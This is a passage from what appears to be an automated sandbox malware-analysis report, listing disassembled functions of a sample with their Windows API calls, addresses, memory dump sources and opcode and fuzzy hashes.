                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                  • String ID:
                                                                                  • API String ID: 259663610-0
                                                                                  • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                                  • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                                                  • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                                  • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                                                  APIs
                                                                                  • GetClientRect.USER32(?,?), ref: 004302E6
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                                  • GetClientRect.USER32(?,?), ref: 00430364
                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                                  • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                                  • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                  • String ID:
                                                                                  • API String ID: 3220332590-0
                                                                                  • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                  • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                                  • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                  • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                  • String ID:
                                                                                  • API String ID: 1612042205-0
                                                                                  • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                                  • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                                                  • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                                  • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove_strncmp
                                                                                  • String ID: >$U$\
                                                                                  • API String ID: 2666721431-237099441
                                                                                  • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                  • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                                                  • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                  • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                                                  APIs
                                                                                  • GetKeyboardState.USER32(?), ref: 0044C570
                                                                                  • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                                  • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                                  • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                                  • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                                  • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePost$KeyboardState$InputSend
                                                                                  • String ID:
                                                                                  • API String ID: 2221674350-0
                                                                                  • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                  • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                                  • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                  • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscpy$_wcscat
                                                                                  • String ID:
                                                                                  • API String ID: 2037614760-0
                                                                                  • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                                  • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                                                  • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                                  • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                  • VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$Copy$AllocClearErrorLastString
                                                                                  • String ID:
                                                                                  • API String ID: 960795272-0
                                                                                  • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                  • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                                                  • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                  • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Delete$Copy__fread_nolock
                                                                                  • String ID:
                                                                                  • API String ID: 2446588422-0
                                                                                  • Opcode ID: 79d811be90fff68cde7f06b13108d27ea7637e4834378253289aee473bd03d8a
                                                                                  • Instruction ID: e3b766f0d7570c057f36e817525b07a345c540c94ec9958bdefdc59333e68e6d
                                                                                  • Opcode Fuzzy Hash: 79d811be90fff68cde7f06b13108d27ea7637e4834378253289aee473bd03d8a
                                                                                  • Instruction Fuzzy Hash: D9517CB26083409BC320DF6AD984AAFB7E8FBD9740F10492FF68983201DA75D548CB56
                                                                                  APIs
                                                                                  • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                                  • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                  • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                  • EndPaint.USER32(?,?), ref: 00447D13
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                  • String ID:
                                                                                  • API String ID: 4189319755-0
                                                                                  • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                  • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                                  • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                  • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                                  • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                                  • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                  • String ID:
                                                                                  • API String ID: 1976402638-0
                                                                                  • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                  • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                                                  • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                  • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                                                  APIs
                                                                                  • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                                  • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                                  • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                                  • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                                  • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 642888154-0
                                                                                  • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                  • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                                  • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                  • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                                  • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                  • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                  • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                  • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                  • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Enable$Show$MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 1871949834-0
                                                                                  • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                  • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                                  • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                  • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                  • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                                  • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                  • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                                  APIs
                                                                                  • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                                  • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                                  • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                                  • SendMessageW.USER32 ref: 00471AE3
                                                                                  • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                                  • String ID:
                                                                                  • API String ID: 3611059338-0
                                                                                  • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                  • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                                  • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                  • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                  • String ID:
                                                                                  • API String ID: 1640429340-0
                                                                                  • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                  • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                                  • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                  • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                                  APIs
                                                                                    • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                    • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                  • _wcslen.LIBCMT ref: 004438CD
                                                                                  • _wcslen.LIBCMT ref: 004438E6
                                                                                  • _wcstok.LIBCMT ref: 004438F8
                                                                                  • _wcslen.LIBCMT ref: 0044390C
